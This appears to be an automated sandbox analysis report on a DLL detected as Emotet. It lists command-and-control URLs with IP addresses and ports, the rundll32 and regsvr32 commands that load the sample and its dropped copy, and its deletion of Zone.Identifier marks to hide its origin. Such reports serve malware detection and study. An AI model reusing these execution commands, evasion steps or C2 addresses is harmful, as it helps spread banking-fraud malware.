                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://217.182.25.250/6
                      Source: regsvr32.exe, 00000006.00000002.972587978.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564257822.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://217.182.25.250:8080/wyXUykQBFXLgUDhBPADNipDGWMKugALsfbonBqKseR
                      Source: regsvr32.exe, 00000006.00000002.972587978.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564257822.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://217.182.25.250:8080/wyXUykQBFXLgUDhBPADNipDGWMKugALsfbonBqKseR9
                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.76.89/
                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquq
                      Source: regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://51.91.76.89:8080/wILlkzMrsIIqrWuKTJoVXizoHkadIszFHcIlGojhnBcDobePKzyquq9
                      Source: regsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.506733124.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/
                      Source: regsvr32.exe, 00000006.00000003.552388525.0000000002F92000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/Default
                      Source: regsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjw
                      Source: regsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/lKdeDesHKlwQRuBQoJMtzzkSkkKhWjwq
                      Source: regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110/
                      Source: regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110/t
                      Source: regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552388525.0000000002F92000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110:8080/
                      Source: regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110:8080/OozwNWoXrNLqNNtlQCBStrfsHlZQDyVVCeVUrhuzIDQnbSNZedOwyJtV
                      Source: regsvr32.exe, 00000006.00000002.972587978.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564257822.0000000002FC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110:8080/OozwNWoXrNLqNNtlQCBStrfsHlZQDyVVCeVUrhuzIDQnbSNZedOwyJtV6
                      Source: regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110:8080/i
                      Source: svchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000015.00000003.764113869.0000020F4E378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762818013.0000020F4E3A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762692728.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762844012.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762785842.0000020F4E398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.764136260.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000015.00000003.767387577.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.767327941.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000015.00000003.764113869.0000020F4E378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762818013.0000020F4E3A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762692728.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762844012.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762785842.0000020F4E398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.764136260.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000015.00000003.764113869.0000020F4E378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762818013.0000020F4E3A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762692728.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762844012.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.762785842.0000020F4E398000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.764136260.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000015.00000003.771381314.0000020F4E802000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.771276935.0000020F4E3AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.771350523.0000020F4E37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.771307358.0000020F4E398000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: loaddll32.exe, 00000000.00000002.466537071.000000000097B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000ACED GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_1000ACED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000ACED GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_1000ACED

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 3.2.rundll32.exe.bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.c10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3250000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.43f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3250000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.c00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.2f00000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.c10000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.972201454.0000000002F01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.471795717.00000000043F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.465962452.0000000000C01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.466876693.0000000003250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.471763679.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.465829043.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.466979688.0000000003281000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.972129886.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: xhOJLzQSe7.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile deleted: C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwg:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Smcoeugpjqpltwaq\Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100210912_2_10021091
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100301402_2_10030140
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100221642_2_10022164
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100202202_2_10020220
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002D49C2_2_1002D49C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100245562_2_10024556
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100215642_2_10021564
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000C5782_2_1000C578
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100306822_2_10030682
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100219382_2_10021938
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10028B9A2_2_10028B9A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002FBFE2_2_1002FBFE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10026C812_2_10026C81
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10030D462_2_10030D46
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10021D442_2_10021D44
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10031E112_2_10031E11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100210913_2_10021091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100301403_2_10030140
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100221643_2_10022164
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100202203_2_10020220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002D49C3_2_1002D49C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100245563_2_10024556
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100215643_2_10021564
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000C5783_2_1000C578
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100306823_2_10030682
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100219383_2_10021938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10028B9A3_2_10028B9A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002FBFE3_2_1002FBFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10026C813_2_10026C81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10030D463_2_10030D46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10021D443_2_10021D44
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10031E113_2_10031E11
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001FBC4 appears 143 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1001FBF7 appears 39 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10022714 appears 51 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10004D7A appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001FBC4 appears 143 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001FBF7 appears 39 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10022714 appears 51 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10004D7A appears 33 times
                      Source: xhOJLzQSe7.dllBinary or memory string: OriginalFilenameBaseDLG_MFC.EXEN vs xhOJLzQSe7.dll
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: xhOJLzQSe7.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: xhOJLzQSe7.dllVirustotal: Detection: 69%
                      Source: xhOJLzQSe7.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\xhOJLzQSe7.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xhOJLzQSe7.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwg"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\xhOJLzQSe7.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\xhOJLzQSe7.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwg"Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@17/5@0/35
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xhOJLzQSe7.dll",#1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100042F6 GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,FindResourceW,LoadResource,SizeofResource,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,VirtualAllocExNuma,GetCurrencyFormatW,GetCurrencyFormatW,GetCurrencyFormatW,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,2_2_100042F6
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: xhOJLzQSe7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: xhOJLzQSe7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: xhOJLzQSe7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: xhOJLzQSe7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: xhOJLzQSe7.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10022759 push ecx; ret 2_2_1002276C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001FC9C push ecx; ret 2_2_1001FCAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10022759 push ecx; ret 3_2_1002276C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001FC9C push ecx; ret 3_2_1001FCAF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002C912 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,2_2_1002C912
                      Source: xhOJLzQSe7.dllStatic PE information: real checksum: 0xa0f94 should be: 0xa1c03
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\xhOJLzQSe7.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwgJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Smcoeugpjqpltwaq\padmvjcc.wwg:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Xzqbzebvc\likpmyarcnrmr.nnt:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Peztz\yraxpwfxlfeitn.uit:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100084E6 IsIconic,GetWindowPlacement,GetWindowRect,2_2_100084E6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100037A6 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_100037A6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100084E6 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100084E6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100037A6 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_100037A6
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7148Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 5944Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6352Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_10011C86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011C86 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_10011C86
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-26930
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-26847
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-27146
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-27063
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000008.00000002.840968249.00000257CCC64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@Hyper-V RAW
                      Source: svchost.exe, 00000015.00000002.799503325.0000020F4DAF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: regsvr32.exe, 00000006.00000003.506754073.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552349353.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.972404800.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.564199843.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.506733124.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552388525.0000000002F92000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.552291019.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.840188612.00000257C742A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.840947326.00000257CCC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.799200631.0000020F4DA85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000C.00000002.972147470.000001A5AC602000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000000C.00000002.972252494.000001A5AC628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
